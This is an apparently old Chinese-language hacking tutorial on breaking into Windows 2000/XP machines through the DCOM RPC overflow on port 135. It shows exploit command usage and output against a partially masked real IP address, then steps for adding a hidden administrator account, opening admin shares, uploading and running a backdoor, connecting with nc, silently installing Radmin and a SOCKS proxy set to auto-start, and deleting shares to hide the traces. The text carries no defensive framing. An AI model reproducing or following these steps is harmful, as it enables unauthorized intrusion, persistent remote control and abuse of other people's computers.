1、利用dcomrpc遠程溢出漏洞入侵主機最近，網上非常流行dcomrpc，那今天我們就教你詳細的利用dcomrpc入侵。和入侵之后必須做什么。 需要的工具： 很好的： radmin.EE 掃描工具: retinarpcdcom.EE 溢出攻擊工具:RpcDcom(通用溢出工具) 腳本開啟 telnet工具：telnet.vbe opentelnet.EE resumetelnet.EE 代理：sksockserver.EE 后門程序：WinEggDropShellPro3thVersion 好了，該做的都做的差不多了。 先使用retinarpcdcom.EE掃描一個網段。查找有rpc漏洞的機子，

2、這個漏洞需要135端口開放，(想必 隨便掃一下就會發現有許多主機開放的135端口) 211.217.50.xx 第一個主機就被掃出來又此漏洞。 看看211.217.50.xx有沒有其他的漏洞或是若口令之類的.我們可以使用流光掃描一下其他的缺陷主機開了3389端口我們可以上去看一下是xp版本還是win2k是win2k server版本展開命令行： 查看dcomrpc的用法 用法 dcomrpc -d options F:/hack>cd rpc/dcomrpc RPC DCOM Expl01t coded by .:oc192.us:. Security Complied and Modi

3、fied by Expl01t Usage: dcomrpc -d <host> options Options: -d: Hostname to attack Required -t: Type Default: 0 -r: Return address Default: Selected from target -p: Attack port Default: 135 -l: Bindshell port Default: 666 Types: 0 0x0018759f: Win2k-Universal 1 0x0100139d: WinXP-Universal 開始進行溢出：

4、 F:/hack>cd rpc/dcomrpc -d 211.217.50.xx 0 RPC DCOM remote expl01t - .:oc192.us:. Security Complied and recorrected by Expl01t + Resolving host. + Done. + Expl01ting.Just wait. 等到出現，說明溢出成功 c:/winnt/system32> 接著我們建立用戶 c:/winnt/system32>net user blueye$ 1111 /add 命令成功完成。 把用戶添加成超級管理員 c:/winnt/

5、system32>net localgroup administrators blueye$ /add 命令成功完成。 看看共享開了沒有沒有的話把共享開開 c:/winnt/system32>net share 清單是空的。 c:/winnt/system32>net share ipc$ 命令成功完成。 c:/winnt/system32>net share admin$ 命令成功完成。 到這里我們入侵告一段落 建 立 IPC$ 連 接 ，也可以使用tftp上傳 ，先和對方建立連接 F:/hack>net use /211.217.50.xx/ipc$ &quo

6、t;1111" /user:blueye$ 上 傳 一 個 后 門 程 序 到 對 方 的 主 機 里 F:/hack>copy d:/inject.EE /211.217.50.xx/admin$/system32 F:/hack>copy d:/tback.dll /211.217.50.xx/admin$/system32 然后運行后門程序，我們可以使用at命令。但是有的機器把at明令禁止了，建議直接開起telnet 使用opentelnet.EE 關閉開啟的telnet使用resumetelnet / /ip user password 如果忘記開共享可以使用腳本

7、開啟 telnet來開共享，用法: cscript telnet.vbe ip user password null port (null是驗證方式) F:/hack>opentenet /211.217.50.xx blueye$ 1111 1 4567 F:/hack>telnet 211.217.50.xx 4567 (省略) 連接并運行后門程序運行后門程序命令 根目錄：inject.EE -run (后門使用方法和安裝都在zip文件里面包含了) 后門端口123456 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDr

8、opShell Matrix Version Melody 下面安裝radmin，配置好的radmin客戶端有4個文件。配置radmin客戶端可參考相關文章。 radmin.reg raddrv.dll admdll.dll r_server.EE 把這個4個文件copy c:/winnt/system32 在目錄下面執行命令 c:/winnt/system32>r_server /s radmin.reg -導入注冊表 c:/winnt/system32>r_server /install /silence -安裝radmin.并且不顯示托盤 c:/winnt/system32&

9、gt;net start r_server - 啟動服務 安裝sock代理 把sksockserver.EE copy c:/winnt/system32 c:/winnt/system32>sksockserver /install -安裝服務 c:/winnt/system32>sksockserver -config port 1234 -端口定在1234 自己可以改 c:/winnt/system32>sksockserver -config starttype 2 -開機自動啟動 c:/winnt/system32>net start skserver -啟動

10、服務 最后刪除共享 net share ipc$ /del net share admin$ /del 在安裝radmin的時候你發現有人已經安裝了。 看操作 (我輸入的內容) 后門連接 F:/hack>nc 211.217.50.xx 123456 Welcome To WinEggDropShell Matrix Version Melody #(pslist) Melody #(pskill r_server) Melody #(shell) c:/winnt/system32>(del r_server.EE) c:/winnt/system32>(del admdll.dll) c:/winnt/system32>(del raddrv.dll) copy你自己的上去，然后安裝 省事的辦法直接導入注冊表，然后重新輸入安裝命令運行，就可以了，只是在原來默認端口上